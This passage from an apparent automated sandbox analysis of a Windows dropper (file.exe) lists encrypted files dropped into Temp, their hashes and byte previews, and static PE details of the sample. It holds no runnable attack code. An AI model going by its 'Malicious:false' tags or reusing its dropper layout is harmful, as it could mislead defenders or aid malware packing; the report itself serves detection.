                                                                                      Preview:...... A}..~D7...6f...K..d...i.........].}.9.7;..b..TF.S..n../..G...X..&4.)...UO2.q..eX.X..X.m&Ja.d.>...f...?..S....Qm.W.\...3\(.d....jap..G.>Cn}.I..t...d.....O..!...!..P..TT..Q..GC.[F.(N|./.|.@...@..E.Y.frBfR..U.9.....#...p1.&.......i....ha... .G3N*rK...O..U.s-U|y.<.....'v;.._.i..../.z....@..7.YV[.v.G..N9..Lc..'..*..S...z....n$...4.h.*.I...)..I."6%."...yDc...a.3LB...$.h..U`..8%(.(.....8.O.t.pC2...".IK.c.u.T... .%|.....];.......Y&....F.pX."....P...O.........$..-./....<C@Y...j.&..2..jx.O..# GS@g..g.....ac.P..z..{'.?Se.l<|p-..urT..)IG....K..._..S..y....&....b....NS\#.2?.Y....g.ufy.d.b.I.R.j..C............@..Q8...V...z.<..O.....s........}....,..a...)E.1..|.oo...#..q.$.G..k..#........X../.t)..c.8t#.\...i.H...~l.r..S.60..q..[....~\0\V.Q.JB.<p.s.....n.'...pw...V'.=..=S.Q.D....(,#..b..m.:.......~.....e*)...rf'....../.......;W..u..#c..E.e.......07..].W.N..f...2@.'./.....s].B...+K..-.>....P..r....p......h.b.h.#QA:.k..P.o.a.:.!

                                                                                      C:\Users\user\AppData\Local\Temp\Everything

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):71680
                                                                                      Entropy (8bit):7.997108429898175
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:Jh79hPC9eMVup3EoWB7LAzTQoss5nwWFlMj6t+zPp:p9C9bqEj7LOwi3FlJ+7p
                                                                                      MD5:AC4E1FBAF6EB5121395B540E66B38A99
                                                                                      SHA1:D2C2BB7F854864E2FFBFBE4CCA0EBD94BA28E39A
                                                                                      SHA-256:C747FEC5DA91AF3C73F0F3FFEC58882F22E66CC8C31D1533E06EBA2E88A1AB9E
                                                                                      SHA-512:1CDAFC7F4218A3EB607D51B28AABD887AC76CDA8E4AC5CFA0034F3B0B89E570D2A99FB46E5E10B6463E156C0C430AF41ABF98D1101EF8CC66EDA545C21343128
                                                                                      Malicious:false
                                                                                      Preview:..9.Z..ovq.I....GZ.....fS..l..`yZx....H.'kj.3k.B...B..'.+| H.$#+'b.t..n....Sd3z..6O.Db......Z....n.fnLa4\..O...>2.".,.!2...*........>....v...R.=C..\h...n...P.._"..........Er.P...B`h.AW..X...{...z...IU..RM..o:sK.....kL0...U.?......[.8.N...V.H(.p..A...h.&..A.....9.F..N...H.j..u...I(.M'Uu.}....?M.S..K#8..md.2\k(Ky..{.)?....`7......<i..;r..../<....-...IK.Fd..6.8......>.\2..g...$.NA..5. ..F..u..M.-......^.&...w.[z0.......:..Q........'|.4..0w.u..b.Me......./.....Y... >F.....Y.o..=..J....i9..~f...["..P..[.P.I...V..6jH..9...1.D3D!5-%d....>.|...jI1.w..H@\.e<.g..}.R...B..,.F..R.' ........}o0..->.......L0ed......\z....uz..V....E. ..}...c.P.i.._...Y....@.x....a.!_S....r.U...x&'{...;!.....ZT.......8JE0VQ.B\ie.0.>.+.w..i4.#P)U.L{.4..'.........}..p.F..F^.U..a.d.U.J.p.\...1..<x.v..SB..L.x.yb.......J...2...7j.0..hRd.+..:...iC+.K.q.o..@....K.E)..._r/._. .S.....d.!..@.............F...Q....n..S.M"~..5.,....q.......ds..t...}^ 5.Ixt.R.3.D6......i.

                                                                                      C:\Users\user\AppData\Local\Temp\Kept

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):86016
                                                                                      Entropy (8bit):7.998265686160575
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:nSuCFZe2jb1DgtQU6madYJshURG0tcni2EMBRqjZeSKRaJ6WVZUqMBQ4Vau4Useh:SpbjtIQBdYJP9t/2hmiRa4WVZJMm4EHW
                                                                                      MD5:1907385FF9BC97C2FFDE248BD913FFB2
                                                                                      SHA1:01E8B5D3831AEDD4DE6DB3242B22B5B62A588E52
                                                                                      SHA-256:4132EC7F7053930842FDF109B944306698087960439ED34C0EA4AF8D72E62DED
                                                                                      SHA-512:C5F9027FF61952353BF423ECE60348BA31A8D7B056ABEEF99708E29AC8199BCD2035F4BE2A411ACC4FCEDAAA7DF481BB1E031C632935CFCCF110FC5AA6361CAF
                                                                                      Malicious:false
                                                                                      Preview:..?..~.......q!...J.V...!;...R...o.m...HRS.....!/.}.1vG...C.H3(.(.I.A...O.b...&.M.d......J...P.....c..M....fn.H6..s..k&..H":H.J"......w...z.F*.eWB*.\..o...xj.3F..|..pm.....M._..."r..(.L.J.bui.@.).Un.4...ay.Sq...0......Dm.aZL..t..6....B.y..Y.......}..P...$.Z-...[.r.:.G...y...3.T'_.=.78X2...9B+QI..>~.ib..3--r[.0,.......n.......bOR.\B...o.......>.y.;5V.].;A.....re..^.......E.;qS....#...L.......k.ow.5....W..E.s/.?..4...b....|..;j.4..O.......KaA .*....:...t....$vU..*...<{...)...*v....+.?...".4B.....JLr-,....H..L<,T.......Q..Q..E..iK..D.)&......[w..r.....r5;....)t......?......8.5I.H..?.b....L+.ej..nZ......T..*..h.w;>..Bh..;.u.....!.._..e..=e/.5..Ng...k..?..~%.;.p...'.....6):.P..N..9%..C.u.P2.NN...u.-.6...L<.+......8......!.&......MM.n...l .L.._..{r........'C...J.I...i..~,....%....-\D....tW.}.w...^.%G..5..4|.xu..........HJg..s....C...2..L.K}R@.[..;.=...PJ|..b......#..r{>.o.3.+...>fT.....3..'..^fN.s..[.E..{.>.Koq..E..[i.TUu.b.B.....&.

                                                                                      C:\Users\user\AppData\Local\Temp\Neo

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):892629
                                                                                      Entropy (8bit):6.622545718722573
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:HpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:HTxz1JMyyzlohMf1tN70aw8501
                                                                                      MD5:44F893AC56AB6A3DACAC37928E513292
                                                                                      SHA1:BDDFD7E26C070315A52AED66C58660AB972DDDF7
                                                                                      SHA-256:8959FAFFF952490148BCDB0EB16F8D73CCCC82332BE950CDE0DDF47FE045CE23
                                                                                      SHA-512:775F8A39FC4C60E7BBD5035D8A52038A0C741FADCBCFE8297E418AB977E063DA34D61B48BB0EC84299E3312CE33E6CB133FA953F0B393F77842EF9716E8F921E
                                                                                      Malicious:false
                                                                                      Preview:..............................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F|U............[...U......Ky......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..QQ.E....I.Pj.hD.I..............f.}.1.....].U..QQ.}..SVtr.u...tk3.3.f...E.Pj.SRQ....I...uQ.E.W.<..E..}.PVSS.u..u... .I...u..E...E.;E.s.3.f..F...u.....I..._^[..].3.f.D7...2...U..SV..j.[.F.9F.u0...j.X;.sL3.F...W.......Q.....~....Y......~._S......Y..t..M......N..F.....F.^[]......3...V...N..V..F..4.......F.Y.N.^.$...V..W3.9~........f.._^.V....h.I.....

                                                                                      C:\Users\user\AppData\Local\Temp\Para

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1011
                                                                                      Entropy (8bit):3.200344146341136
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Imkd5yGSGCbTQxbs/0pQHPZdsLq6h1b5zGbWCBl9dte4:IfnyGSnPQxqtPMLqCj8WCBl9dte4
                                                                                      MD5:D3C964C6EA585D3E9B35832FDC06FDB4
                                                                                      SHA1:3CB85C5EBE13F948BE849DB25982F19D0B21A05D
                                                                                      SHA-256:8B7E7F699E440F6E42AC2AA48E3504DC1C2ED6FC6E7A98E2498D99DCC79E484F
                                                                                      SHA-512:37DE8D3542A6F6D15849774ABDC35B654A52722605E906145017445DE8686B33BBEF4E6B48AD2BD9ED475751CAB29BD42E8C250B5DD00BBD8E17EA42A5ECF76F
                                                                                      Malicious:false
                                                                                      Preview:NorwegianLivedJerseyRelaxation..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Say

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):21929
                                                                                      Entropy (8bit):7.9917254746338
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:2Yli0yKpahDnvZyyrj1QyGvAsJU46l558h5DCjPwl9gBVU6JVjeCffM4Mp:dc0yKmnvZymMJU46l/y5DCjCQ5VKCff4
                                                                                      MD5:F0BB9C59AA330F8B9A273AF5A13B2B17
                                                                                      SHA1:9953AC1402C4556046C37B7B0A818C1C920C0154
                                                                                      SHA-256:DBB97494D51748E748F8528BEFA8097C83107BE9F24D96EAE3D437220DBEF324
                                                                                      SHA-512:7FED666274E66461F2692C5CFE7F643C9D9E931F2262D18D0518299BCE5973F9907DB6BF0EC24A2AA659F7772E6A9C42A8F4882EBEE7EA2E09E4A1FF7D57DAD1
                                                                                      Malicious:false
                                                                                      Preview:.x....F.....(....:.........BNY.....6$+..\[c/.!i.....`.'M.^.:.......5..,MS.4bt..W.T...yE-..'..GF|.Q.9....i....<.~..T....+t..L.4.....t.c.I|....hM..U.|....1V.j...... .3.Z.Yi(.U/.o`.....6..r.......[.TP..X.1.]...Rz.&.h.@..g....4..>...U....G......,...6..v$<g...Ti.c.4^..G(k..7C&,.qB........uB.....7...\..L".....6.S....0.*.........]w.{e..(`.O...Q.@...&.......do...Y.3....O..(.=..PE..SH....0.9h..IB..W.....+K.;p...Y..;...z..AO6.@p.V"h._....:..;^cA...W....y.%.Aq.f.D..k.^.X..k4.....4y:.=i!.94.....#......D`.%.<.Mh.j..[.9....G^...;..d.}..j $.....x._...KJg....[..-K..p..\_..?....Q.9#<?2.Q.V#.E..X....K.\...i'..Q..T.(..._..ib4..5.i2...w....#.y.{..'?v...E..)..E..o3!.e...O6.E..X.^....f.so.y.....w.V.o..[W.I...m...R%G...j.W.e... ...Yd.......7:c......j./{*S..'@......m<x>I...m.N0...I..-..&...O#p@p.......3-.i.f..YA..m#...h..L..\.......~...G...[.$......H..wF.E....Q.....*....Lc;.Q..\...U4.F;.$..KQ..%.g.".}o....c|E....>.W,.we.....s....IU......E..^e+.S.Mw.&3.....sL.

                                                                                      C:\Users\user\AppData\Local\Temp\Thousands

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):82944
                                                                                      Entropy (8bit):7.9974914813164295
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:x+LKKw8HO2PCYo0UIMoPUcDRnnKHBst+tMnBU1YPeqp:4L3PCYoIMoP5RK2+tMnBU0ec
                                                                                      MD5:8DCAD160314DB7EF9908F09247C4623C
                                                                                      SHA1:8DD90A69427B679F0A151FC1593A34767C381487
                                                                                      SHA-256:1E4C86861AC03CA910FB4F3C48F5B073B2E4D6F192C7F71D085E54C4FB50B6E9
                                                                                      SHA-512:72B21754F6B604DC47DD71625402883C0DE0E5A0520CBFE612011E4D740D214BB0959DE7E192164BFE1B522D1AB8377C5C9C03B0C7FE61E76E579281A9667201
                                                                                      Malicious:false
                                                                                      Preview:W.:.\...X..h..%....H......=..w..J..eX...c..BE..+dX..)..6F....V.n....mN...%....O.9......6.^...?.3$....).IiMb$..,.,....Pq{=".....m.]......Ei.l_V.S...?...3g...Hn......cP.fc6.0N!r.j....!..k.k...8..+\y3....).G.......?.....=i..w..:\.(.X.HR.r...r.IW.E...t +.4..S.....!}.R.6.6f.N.(........[.....h..G...!..(...oc.D=.....].9lOd..\hq.,.2...Z....]H.*_.dZ...UJ.F._..K..w(..>.^q..._.Ow.{'......S..f...*jc"K..D8cq.[....u....Le/F.....|.J.*1,.ym.l...;.q2.O.....^.%dk...._*]S.gU.o|`..A....W..!'F.l._.|>{.H.r.{N".o.pr}.U..P:"d.,2=.9/U..P"\.be.b.g...;...R~...~.b.O..-.i.....(5.\]..Mj].....\.[..a......^...|.j....J:.....e..Ge%.....@0.<5v......N./..Z.d.2.._. ....vv.V.}..>w~......[...^../..!w.\.s..wM.}.@.&^'....W...jS..r.#..Z..=.4BU.V\...#.KZ.....X.........fr.....c..c.}L$..<%..Q..Dg...L..&.PG....wR..Z^:......;w.dd/...l]..t....=..PYd~..)...C..R.m.u}..v...:k...C^|Nf...E.f........(.eHd....V7......yy$P....#=...n.#fv.......1...HH....\...a......qB..@.W..7j9.^.<.%*\..._7.

                                                                                      C:\Users\user\AppData\Local\Temp\Ventures

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):82944
                                                                                      Entropy (8bit):7.997827426624509
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:W1tfAe9pUP8QoT0BX1ABOe1p3fSI9iUFEl8pN4G5cBOcZV:W1bYBSmFABp1p3tiUF48DJg
                                                                                      MD5:1376D8F8BCD859620D17D2199452883B
                                                                                      SHA1:3C1F24447D68084F364E750E0ECAE3F5667CA537
                                                                                      SHA-256:A06ADBF1F68A296D9049E5AB4FA8DEBF0F68A29E37ED1CEB5481D8F15F85033A
                                                                                      SHA-512:FE0A1F6A48A1B5A404B289320D27FBCCD67F1DE4080081D7E4E3B93611BC0ECE52636276BDB2FBB5E32F3662640536E9CFFA6C86C0D3F41041309D7386B0B36B
                                                                                      Malicious:false
                                                                                      Preview:..E..^..N [5.....AO.x.<C%...p.-o...U....#|.G.v...Z;..~.. .....o...].8.....RE.k..0IJLb.....L1.(...W...dp.W.%n..Z[z&.\mQ.@.K..5)n].....}..\..G....5...q..-f............q.A....m.@>..z..,.r.b.=S(.*...t..p.q.h..&.^..._8...I.u....Yb!*..<.M...*.;..[...........#.@PP.....D.....b.c]..P.F.....#g.R....x.6EJXc.OE..Pq.xJtN........=......o&<...`.@..\....F....%..y...^R..H..<.|....c.V..J.r..R....~....[._..^....&.(..@l.^...nD................H o..X?k..kY.-|...q.....4.D..H.q.p..l)SH..I.O.....!_Zi.]....n&......i'Gw....e.-ml.$Pm9..S...]...V..+r.<...O..o.X}.)..._....1.B.TB..n.B.7.....(.t......z-]6..}....`..;.....M..f.5by.Z.B.4....0..J..w...0(..,'..j...BS..hu&l..H.....)j...).T....1q...z....V~).U.A4.l.1@_]04*W.l9..ij........>.S....m...1~..E.b.`.D~..t.h...=%J.v.W..)....7........+.;X.Vh.....4.Mdt.+7.<...a..]+k.$;.p5M...W.,.F.m...Ao..2..6*G...t.....*.)A...E*.E...m=h.Q..d.....2.Xm........P.5..m.8/...........X>.q..l.>.R..m..$....x.w...f.=Vd.'...3...@..(...._f..#y.

                                                                                      C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1048575
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:DLLf:z
                                                                                      MD5:7B917A7B012EB5A9F993CD2C67334ECE
                                                                                      SHA1:4F0CA9CA2848ECC2B9AA7A5E22949DB338B803EA
                                                                                      SHA-256:F3CDA3194964C8B6A28E4B57518DA8DD58A47BD0FD92FF5C3E5ECBE123A00265
                                                                                      SHA-512:64BFF80F278D832BAD2199911B012CD1666ACA2FA74C1C88B1067BA8652D8A27488A756249D59C6D1DDA6A4122DA7635D19AC3800ED12587AC0D21B42F5F25DE
                                                                                      Malicious:false
                                                                                      Preview:nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn

                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.418972280455513
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:xSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:IvloTMW+EZMM6DFyn03w
                                                                                      MD5:E760BD1426673F6F2C66213918A472BA
                                                                                      SHA1:7CF84566534638CBB843DEDEEF8A9D5817C16C3F
                                                                                      SHA-256:522C74EEFC0970600B605A9E2F68AC4AF40589E3EBA676FFE15484BAFBAC9337
                                                                                      SHA-512:DB4B560EBBD75F6D2C4F4095EF3C1C458AEFBFA9E508504F09952759F9A2EB80FB33FDB45BE48BBADB87E02D605663094DBDA43E2DC707427A0D805A2873BED7
                                                                                      Malicious:false
                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.q.AD...............................................................................................................................................................................................................................................................................................................................................Xq.u........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.830131541214044
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:file.exe
                                                                                      File size:913'051 bytes
                                                                                      MD5:2f5226b4116ce79afb6dcb32fa647954
                                                                                      SHA1:15f395c9a4a894a660d318a6779094d311f0a1f7
                                                                                      SHA256:8febc589fc4de7b009d3e406fddba66e389d5544bc5fad44d03f712ebf6c2bfa
                                                                                      SHA512:7fe94c2adf2d5526a9798b1fddf62984b49787b5c0ed2e9ef2aeb765ba9922ecda8d71fe7966452b3e84a4b84e37096f5dd9c0e700f99dc94fe5d261c36c1013
                                                                                      SSDEEP:24576:tEbCyouWvEBYeO3QnE4t4BVb5iaSHLKvm+pq6GabL8Z:2WpM4apHLCm+M6l/o
                                                                                      TLSH:C91523E482D0A176FEF70E3266B119520876BC4650A2A50E97C574BF7C771C8A43FB27
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                                                                      File Icon

                                                                                      Icon Hash:06dcd978e6e99882

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x403883
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:0
                                                                                      File Version Major:5
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      sub esp, 000002D4h
                                                                                      push ebx
                                                                                      push ebp
                                                                                      push esi
                                                                                      push edi
                                                                                      push 00000020h
                                                                                      xor ebp, ebp
                                                                                      pop esi
                                                                                      mov dword ptr [esp+18h], ebp
                                                                                      mov dword ptr [esp+10h], 00409268h
                                                                                      mov dword ptr [esp+14h], ebp
                                                                                      call dword ptr [00408030h]
                                                                                      push 00008001h
                                                                                      call dword ptr [004080B4h]
                                                                                      push ebp
                                                                                      call dword ptr [004082C0h]
                                                                                      push 00000008h
                                                                                      mov dword ptr [00472EB8h], eax
                                                                                      call 00007FE930908C1Bh
                                                                                      push ebp
                                                                                      push 000002B4h
                                                                                      mov dword ptr [00472DD0h], eax
                                                                                      lea eax, dword ptr [esp+38h]
                                                                                      push eax
                                                                                      push ebp
                                                                                      push 00409264h
                                                                                      call dword ptr [00408184h]
                                                                                      push 0040924Ch
                                                                                      push 0046ADC0h
                                                                                      call 00007FE9309088FDh
                                                                                      call dword ptr [004080B0h]
                                                                                      push eax
                                                                                      mov edi, 004C30A0h
                                                                                      push edi
                                                                                      call 00007FE9309088EBh
                                                                                      push ebp
                                                                                      call dword ptr [00408134h]
                                                                                      cmp word ptr [004C30A0h], 0022h
                                                                                      mov dword ptr [00472DD8h], eax
                                                                                      mov eax, edi
                                                                                      jne 00007FE9309061EAh
                                                                                      push 00000022h
                                                                                      pop esi
                                                                                      mov eax, 004C30A2h
                                                                                      push esi
                                                                                      push eax
                                                                                      call 00007FE9309085C1h
                                                                                      push eax
                                                                                      call dword ptr [00408260h]
                                                                                      mov esi, eax
                                                                                      mov dword ptr [esp+1Ch], esi
                                                                                      jmp 00007FE930906273h
                                                                                      push 00000020h
                                                                                      pop ebx
                                                                                      cmp ax, bx
                                                                                      jne 00007FE9309061EAh
                                                                                      add esi, 02h
                                                                                      cmp word ptr [esi], bx

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                      • [LNK] VS2010 SP1 build 40219

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x10800.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x6dae0x6e005536fb96dce1fc25008d6e8d93a3103aFalse0.6611150568181818data6.508600512123772IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0xf40000x108000x10800d5b049b301fc2bf6699f28694a6c3864False0.3453184185606061data3.663462778688186IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x1050000xf320x10000e6c3aeb889763ebb8911cca274dd9beFalse0.32958984375data2.9502214104290445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xf41f00x9928Device independent bitmap graphic, 96 x 192 x 32, image size 39168EnglishUnited States0.3275351968985921
                                                                                      RT_ICON0xfdb180x5638Device independent bitmap graphic, 72 x 144 x 32, image size 22032EnglishUnited States0.35039869517941286
                                                                                      RT_ICON0x1031500x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.4326047358834244
                                                                                      RT_DIALOG0x1042780x100dataEnglishUnited States0.5234375
                                                                                      RT_DIALOG0x1043780x11cdataEnglishUnited States0.6056338028169014
                                                                                      RT_DIALOG0x1044980x60dataEnglishUnited States0.7291666666666666
                                                                                      RT_GROUP_ICON0x1044f80x30dataEnglishUnited States0.875
                                                                                      RT_MANIFEST0x1045280x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
